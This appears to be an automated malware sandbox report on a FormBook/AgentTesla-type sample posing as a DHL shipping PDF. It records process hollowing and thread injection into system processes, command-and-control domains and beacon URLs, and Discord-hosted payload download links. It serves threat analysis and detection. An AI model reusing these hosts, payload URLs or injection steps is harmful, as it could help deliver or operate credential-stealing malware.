Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D714FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D68DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D33540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D3A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBAD30 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_02CF9A50 NtCreateFile,LdrInitializeThunk,

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.15.197.14 80
Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe	Domain query: www.qq8.space
Source: C:\Windows\explorer.exe	Domain query: www.anushreehomemadeproducts.online
Source: C:\Windows\explorer.exe	Network Connect: 178.254.0.81 80
Source: C:\Windows\explorer.exe	Domain query: www.dependablelawnsnow.com
Source: C:\Windows\explorer.exe	Domain query: www.thera.xyz
Source: C:\Windows\explorer.exe	Domain query: www.laliinparfumeri.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.5.62 80
Source: C:\Windows\explorer.exe	Domain query: www.bjhaitaoshop.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.lighterthanlight.net

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2B0000

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BAA008

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 3352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3352

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe

Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.354519919.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.367953216.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Queries volume information: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe VolumeInformation

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection712	Masquerading11	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection712	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information13	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing11	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL AWB# 4AB19037XXX.pdf.exe	33%	Virustotal		Browse
DHL AWB# 4AB19037XXX.pdf.exe	44%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
DHL AWB# 4AB19037XXX.pdf.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.thera.xyz/o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa	0%	Avira URL Cloud	safe
http://www.laliinparfumeri.com/o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa	0%	Avira URL Cloud	safe
http://www.thera.xyz	0%	Avira URL Cloud	safe
http://www.dependablelawnsnow.com/o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa	0%	Avira URL Cloud	safe
http://www.anushreehomemadeproducts.online/o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa	0%	Avira URL Cloud	safe
www.dependablelawnsnow.com/o4um/	0%	Avira URL Cloud	safe
http://www.thera.xyz/	0%	Avira URL Cloud	safe
http://www.lighterthanlight.net/o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.thera.xyz	52.58.78.16	true	true	unknown
cdn.discordapp.com	162.159.133.233	true	false	high
www.anushreehomemadeproducts.online	104.21.5.62	true	true	unknown
laliinparfumeri.com	185.15.197.14	true	true	unknown
dependablelawnsnow.com	34.102.136.180	true	false	unknown
shops.myshopify.com	23.227.38.74	true	false	unknown
www.lighterthanlight.net	178.254.0.81	true	true	unknown
www.dependablelawnsnow.com	unknown	unknown	true	unknown
www.qq8.space	unknown	unknown	true	unknown
www.laliinparfumeri.com	unknown	unknown	true	unknown
www.bjhaitaoshop.com	unknown	unknown	true	unknown
www.themshirt.com	unknown	unknown	true	unknown
www.aquitemtijolo.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.thera.xyz/o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa	true	Avira URL Cloud: safe	unknown
http://www.laliinparfumeri.com/o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/889935662827044904/889981640498090054/runpe.pdf	false		high
http://www.dependablelawnsnow.com/o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/890478905998331907/891784228721807420/bin.pdf	false		high
http://www.anushreehomemadeproducts.online/o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa	true	Avira URL Cloud: safe	unknown
www.dependablelawnsnow.com/o4um/	true	Avira URL Cloud: safe	low
http://www.lighterthanlight.net/o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.thera.xyz	chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com	DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp	false		high
http://www.thera.xyz/	chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.15.197.14	laliinparfumeri.com	Turkey	201520	DEDICATEDTELECOMTR	true
